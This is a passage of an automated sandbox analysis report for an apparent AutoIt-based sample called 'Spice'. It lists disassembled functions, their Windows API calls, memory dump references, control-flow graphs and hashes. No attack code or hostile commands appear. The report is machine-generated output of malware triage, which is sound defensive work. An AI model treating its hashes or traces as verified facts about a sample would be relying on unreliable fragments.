                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E84E7A
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00E84E8E
                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00E84EAF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                      • Opcode ID: e9ad0f731c18e439f3fbebef486f18b6f9d9029710f27feb0aed4f3980f63b88
                                                                                                                                                                                                                                      • Instruction ID: a289ca6899acabe3d206535c7cc454f81b827df74a82974d411cbcc9880801d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9ad0f731c18e439f3fbebef486f18b6f9d9029710f27feb0aed4f3980f63b88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 744133F120830FEADB217F689C09BBA3696F740311F002119F50DBA1E2CA659C00FB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EC0C5B
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00E85787
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00E857DB
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E857EB
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EC0CD1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                                                                                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                      • API String ID: 230667853-4094128768
                                                                                                                                                                                                                                      • Opcode ID: 353fc634aee31a3ba58a1296211458f7aa1bb2247cd148fa5fce36859a526876
                                                                                                                                                                                                                                      • Instruction ID: 0dbe7ddc7edb67e118bf374cd6c782792a350daafd25af51dd11818799664690
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 353fc634aee31a3ba58a1296211458f7aa1bb2247cd148fa5fce36859a526876
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7041A2B1008304AAD321FB60DC45FDFB7DCAB44364F10561EF58DA21A2EF30A64ADB96
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 974 e850db-e8514b CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E85109
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E8512A
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00E8513E
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00E85147
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                      • Opcode ID: 1f67df7227dea6fcd464aa17bd70e6c54ad18aa25382d2cbd994569ed4f31c17
                                                                                                                                                                                                                                      • Instruction ID: 703fbc8830a07dc2a9b8dc2614b3343ce2dfb4ada0d12f3b18c376cb5660bb7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f67df7227dea6fcd464aa17bd70e6c54ad18aa25382d2cbd994569ed4f31c17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F0B7B1645398BAEB712727AC48F673E7EE7C6F60F00011AB900A21A1CA655851FEB0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E84A8C: _fseek.LIBCMT ref: 00E84AA4
                                                                                                                                                                                                                                        • Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DE1
                                                                                                                                                                                                                                        • Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DF4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED9C5F
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED9C66
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED9CD1
                                                                                                                                                                                                                                        • Part of subcall function 00E92F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92F99
                                                                                                                                                                                                                                        • Part of subcall function 00E92F85: GetLastError.KERNEL32(00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92FAB
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED9CD9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                                                                                      • API String ID: 1552873950-2806939583
                                                                                                                                                                                                                                      • Opcode ID: bfba8a2bcdaab3b063d8f2c62350033ee82bfee0e683f6fffc53538dd2134e4a
                                                                                                                                                                                                                                      • Instruction ID: 31895bc931e94ddbd52780f0a4b05ddc3874ff83d1f5875d3cbf6d029c783c4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfba8a2bcdaab3b063d8f2c62350033ee82bfee0e683f6fffc53538dd2134e4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB514CB1A04219AFDF24DF64DC41AAEBBB9FF48304F00109EB659B7381DB715A808F58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1019 e9563d-e95656 1020 e95658-e9565d 1019->1020 1021 e95673 1019->1021 1020->1021 1023 e9565f-e95661 1020->1023 1022 e95675-e9567b 1021->1022 1024 e9567c-e95681 1023->1024 1025 e95663-e95668 call e98d58 1023->1025 1026 e9568f-e95693 1024->1026 1027 e95683-e9568d 1024->1027 1037 e9566e call e98fe6 1025->1037 1030 e956a3-e956a5 1026->1030 1031 e95695-e956a0 call e93010 1026->1031 1027->1026 1029 e956b3-e956c2 1027->1029 1035 e956c9 1029->1035 1036 e956c4-e956c7 1029->1036 1030->1025 1034 e956a7-e956b1 1030->1034 1031->1030 1034->1025 1034->1029 1040 e956ce-e956d3 1035->1040 1036->1040 1037->1021 1041 e956d9-e956e0 1040->1041 1042 e957bc-e957bf 1040->1042 1043 e95721-e95723 1041->1043 1044 e956e2-e956ea 1041->1044 1042->1022 1046 e9578d-e9578e call ea0dd7 1043->1046 1047 e95725-e95727 1043->1047 1044->1043 1045 e956ec 1044->1045 1048 e957ea 1045->1048 1049 e956f2-e956f4 1045->1049 1056 e95793-e95797 1046->1056 1051 e95729-e95731 1047->1051 1052 e9574b-e95756 1047->1052 1055 e957ee-e957f7 1048->1055 1053 e956fb-e95700 1049->1053 1054 e956f6-e956f8 1049->1054 1057 e95741-e95745 1051->1057 1058 e95733-e9573f 1051->1058 1059 e95758 1052->1059 1060 e9575a-e9575d 1052->1060 1062 e957c4-e957c8 1053->1062 1063 e95706-e9571f call ea0ef8 1053->1063 1054->1053 1055->1022 1056->1055 1064 e95799-e9579e 1056->1064 1065 e95747-e95749 1057->1065 1058->1065 1059->1060 1061 e9575f-e9576b call e94906 call ea108b 1060->1061 1060->1062 1080 e95770-e95775 1061->1080 1066 e957da-e957e5 call e98d58 1062->1066 1067 e957ca-e957d7 call e93010 1062->1067 1079 e95782-e9578b 1063->1079 1064->1062 1070 e957a0-e957b1 1064->1070 1065->1060 1066->1037 1067->1066 1075 e957b4-e957b6 1070->1075 1075->1041 1075->1042 1079->1075 1081 e9577b-e9577e 1080->1081 1082 e957fc-e95800 1080->1082 1081->1048 1083 e95780 1081->1083 1082->1055 1083->1079
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1559183368-0
                                                                                                                                                                                                                                      • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                                                                                                                                                      • Instruction ID: 50c98695c5b15128326cf4566f86fcea4c1e2adc1985bed629389e8a9adb71fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6951C572A00B05DBDF268FB9C8806AE77B5AF41324F24972EF835B62D1D7709E509B40
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1084 e752b0-e752c0 1085 e752c6-e752cd 1084->1085 1086 eadf28-eadf2f 1084->1086 1087 eadf3a-eadf41 1085->1087 1088 e752d3-e752ea PeekMessageW 1085->1088 1089 e7530c 1086->1089 1090 eadf35 1086->1090 1087->1089 1093 eadf47 1087->1093 1091 e75313-e75317 1088->1091 1092 e752ec-e752f4 1088->1092 1094 e7530e-e75312 1089->1094 1090->1087 1095 e7531d-e75326 1091->1095 1096 eadf95-eadf9c 1091->1096 1097 eadfab-eadfbc 1092->1097 1098 e752fa-e75306 1092->1098 1099 eadf4c-eadf52 1093->1099 1095->1099 1100 e7532c-e7533c call e7359e 1095->1100 1096->1097 1101 e75368-e7536d 1098->1101 1102 e75308-e7530a 1098->1102 1103 eadf86 1099->1103 1104 eadf54-eadf60 1099->1104 1110 e75352-e75366 TranslateMessage DispatchMessageW 1100->1110 1111 e7533e-e7534e PeekMessageW 1100->1111 1101->1094 1102->1089 1106 e7536f-e75374 1102->1106 1103->1096 1104->1103 1107 eadf62-eadf66 1104->1107 1106->1094 1107->1103 1109 eadf68-eadf7b TranslateAcceleratorW 1107->1109 1109->1111 1112 eadf81 1109->1112 1110->1111 1111->1092 1113 e75350 1111->1113 1112->1100 1113->1091
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E752E6
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7534A
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00E75356
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00E75360
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1795658109-0
                                                                                                                                                                                                                                      • Opcode ID: 2b8a0dfcbe683fe7f73226f9c3e67a2022e970914e82c5029f2f3470c8e67cab
                                                                                                                                                                                                                                      • Instruction ID: 050af984daaf817bc541aa6e241068e403fa9a98d2515a6b3dba264abc12c5d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b8a0dfcbe683fe7f73226f9c3e67a2022e970914e82c5029f2f3470c8e67cab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19316A71508B0AAFDB309B64DC04BFA77E9AB01318F20A059E02AB71F1D7F1A444F711
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1114 e71284-e7128f 1115 e71303-e71305 1114->1115 1116 e71291-e71296 1114->1116 1118 e712f4-e712f9 1115->1118 1116->1115 1117 e71298-e712b0 RegOpenKeyExW 1116->1117 1117->1115 1119 e712b2-e712d1 RegQueryValueExW 1117->1119 1120 e712d3-e712de 1119->1120 1121 e712e8-e712f3 RegCloseKey 1119->1121 1122 e712e0-e712e2 1120->1122 1123 e712fa-e71301 1120->1123 1121->1118 1124 e712e6 1122->1124 1123->1124 1124->1121
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E71275,SwapMouseButtons,00000004,?), ref: 00E712A8
                                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E71275,SwapMouseButtons,00000004,?), ref: 00E712C9
                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E71275,SwapMouseButtons,00000004,?), ref: 00E712EB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                      • Opcode ID: 2655df6ffba1831365862ae776ba743d90319f2541ad40e238efa8b46088a134
                                                                                                                                                                                                                                      • Instruction ID: c46d3f4247eaa8eb79e50d05b6d99875dbb70ea5dcfbfb1a3fad6397c2e882be
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2655df6ffba1831365862ae776ba743d90319f2541ad40e238efa8b46088a134
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7115A71514248BFDB208FA8DC84EEEBBBCEF05744F009599F809E7120D7319E44A7A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00E85B58
                                                                                                                                                                                                                                        • Part of subcall function 00E856F8: _memset.LIBCMT ref: 00E85787
                                                                                                                                                                                                                                        • Part of subcall function 00E856F8: _wcscpy.LIBCMT ref: 00E857DB
                                                                                                                                                                                                                                        • Part of subcall function 00E856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E857EB
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00E85BAD
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E85BBC
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC0D7C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1378193009-0
                                                                                                                                                                                                                                      • Opcode ID: f7a4e38ffe0f3d16dfecc96b1cb581deb7fb69dfdf0c3b59197e59fef657a84c
                                                                                                                                                                                                                                      • Instruction ID: b5b416bbe2c41e63d0a444820cb05a41c0f757eb931e77d310a5e6dbb6ab1d50
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7a4e38ffe0f3d16dfecc96b1cb581deb7fb69dfdf0c3b59197e59fef657a84c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8210A71504784AFEB729B648C95FEBBFECAF11308F00148DE69E66141C7752A85DB41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E827AF,?,00000001), ref: 00E849F4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EBFB04
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EBFB4B
                                                                                                                                                                                                                                        • Part of subcall function 00E829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E82ADF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Bad directive syntax error, xrefs: 00EBFB33
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                                                                                      • String ID: Bad directive syntax error
                                                                                                                                                                                                                                      • API String ID: 2861923089-2118420937
                                                                                                                                                                                                                                      • Opcode ID: 4b64d85e4b071622c417e8cce07a7dc3524e97cc82d99e4156b1f3224738d877
                                                                                                                                                                                                                                      • Instruction ID: 27de1b6b1864831db9dff7e8c0f04a8cae6ef626c59e55d564f8a40b15994746
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b64d85e4b071622c417e8cce07a7dc3524e97cc82d99e4156b1f3224738d877
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E916D71910219AFCF18EFA4CC919EEB7B4FF44314F14556AF81ABB2A1EB309A05CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E84AB2: __fread_nolock.LIBCMT ref: 00E84AD0
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ED9DE1
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ED9DF4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                                                                                                                                      • Opcode ID: 31c6d9e18c7ee0d7d4c4e4ec65087b3b7de6ea0b3855b22b4fa4b2b2019191cd
                                                                                                                                                                                                                                      • Instruction ID: c9ebe7ba1c35a73b6aa7b991d912ccbb0a82d0eb14c394a89d8c0fea00b5a48d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31c6d9e18c7ee0d7d4c4e4ec65087b3b7de6ea0b3855b22b4fa4b2b2019191cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C41F872A4021ABADF21EAE4CC45FEF7BFDDF45714F00046AF904BB281E67199058765
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC032B
